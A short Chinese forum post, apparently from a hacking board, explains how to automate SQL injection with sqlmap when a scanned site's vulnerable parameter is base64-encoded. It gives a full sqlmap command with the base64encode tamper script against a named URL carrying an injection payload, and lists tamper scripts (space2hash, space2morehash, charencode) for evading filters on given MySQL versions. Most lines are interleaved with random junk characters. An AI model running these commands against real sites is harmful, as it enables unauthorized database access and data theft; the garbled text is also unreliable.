WVS扫某站就出来一个SQL Injection,参数还是base64编码的,手工注入麻烦一步,用sqlmap怎么自动注射呢?
8 ^5 s) S) S& Z( r
; g+ Z! g" r) x+ t4 rsqlmap的tamper里有个base64encode.py4 h" m6 {; q, z4 u. }& G
M, l4 r$ C# L: w3 k$ H" K1 P( X0 g
使用如下
6 V; Q5 {" k" D |/ ^) R
& d; D& F! O8 fsqlmap -u http://ha.cker.in/index.php?tel=LTEnIG9yICc4OCc9Jzg5 --tamper base64encode.py –dbs
5 k3 ?( L! n$ a# Y: }& g3 o; ]' m. j$ [, `' w, ]3 Y/ e
% {- h+ B! N) P# Z4 V; Q
sqlmap拥有很多功能强力的插件,插件的使用方法: -- tamper “插件名称”
* v t* u0 p+ E2 ?' a+ { s2 {! k
9 ]# f/ j( w! {, g6 F$ Z, E! p9 {7 X4 j其中常用到的bypass脚本绕过SQLMAP主要两个脚本:- r& P& E$ r! t' }
v3 y; z5 C/ W0 K9 K
space2hash.py ,对于MYSQL数据库 4.0, 5.0注入
: l( j( b, |5 e7 d* B& Lspace2morehash.py ,对于MYSQL数据库 >= 5.1.13 和 MySQL 5.1.41 注入
0 o7 t* u- r" Z5 ?9 Y0 a9 V' n% f首先确定目标数据库版本,然后选择相应的脚本。! V6 w7 h! [% Y5 l& D F
-v 3 --batch --tamper "space2hash.py"
3 b$ [3 X7 H0 D
E$ C$ z" Z" d还有其他一些插件:
; J, y9 ^# P1 \% R0 t+ x0 N4 yencodes编码 ——charencode.py
; J+ m/ C& a: K p+ `base64编码 —— base64encode.py1 {0 r6 @, g* ]5 q i* m) A# {
替换空格和关键字 —— halfversionedmorekeywords.py
9 ]6 @" j a: H- ]/ d7 w/ m+ p! F |
" Y6 L2 Y! E: G/ q7 L/ l7 D. `* Y. F/ Y+ ^# n! j; E w% |
2 g' H: x% O8 b! l& Y
% F1 S7 U2 B6 ~- @6 n5 o; i1 w |